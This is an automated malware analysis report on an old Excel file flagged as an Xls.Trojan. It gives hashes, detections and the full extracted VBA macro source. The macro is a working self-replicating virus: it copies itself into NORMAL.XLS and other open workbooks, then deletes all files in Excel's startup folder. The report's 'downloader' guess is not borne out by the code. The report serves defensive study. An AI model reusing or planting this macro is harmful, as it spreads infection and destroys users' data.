Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6f4ec3c0e2865b66…

MALICIOUS

Office (OLE)

Size: 29.0 KB
Created: 1998-11-06 09:07:16
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 144b9b616d1a5c12bfefd1931d55cb02
SHA-1: ef3044fd95eb2383ff62835a2209e95ed676c7d2
SHA-256: 6f4ec3c0e2865b667c3451c00ade3f2cc4761de6fffb7c5cf780978a0fac55aa
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The critical ClamAV detection and the presence of VBA macros indicate malicious intent. The VBA macro code attempts to infect other Excel files by copying itself into the NORMAL.XLS startup template and then deleting other files in the startup path. This behavior suggests a macro-based worm or downloader.

Heuristics 2

  • ClamAV: Xls.Trojan.Obvious-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Obvious-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2227 bytes
SHA-256: 85ae0029c0b1e7a1b8c9e31c9474f9f48503be4966ea795589cca31819185cdd
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'EcHa original viruses code
'This code written by Reza Pc 212 v1.0
'for all stupid jerk - all my baby cool
'15 November 1999

Private Sub Infected()
    Dim NT, ID, CM As String
    Dim AW, TW, OBJ As Object
    On Error Resume Next
    Let ID = "'15 November 1999"
    Let NT = "NORMAL.XLS"
    Let CM = "ThisWorkbook"
    Set AW = ActiveWorkbook.VBProject.VBComponents(CM).CodeModule
    Set TW = ThisWorkbook.VBProject.VBComponents(CM).CodeModule
    If Dir(Application.StartupPath + "\" + NT) <> NT Then
        ThisWorkbook.SaveAs FileName:=Application.StartupPath + "\" + NT, _
                            FileFormat:=xlNormal, AddToMru:=False
    End If
    If TW.Lines(4, 1) <> ID Then
        TW.DeleteLines 1, TW.CountOfLines
        TW.InsertLines 1, AW.Lines(1, AW.CountOfLines)
    End If
    If AW.Lines(4, 1) <> ID Then
        AW.DeleteLines 1, AW.CountOfLines
        AW.InsertLines 1, TW.Lines(1, TW.CountOfLines)
    End If
    Kill Application.StartupPath + "\*.*"
End Sub
Private Sub Workbook_Deactivate()
    Infected
End Sub
Private Sub Workbook_Activate()
    Infected
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True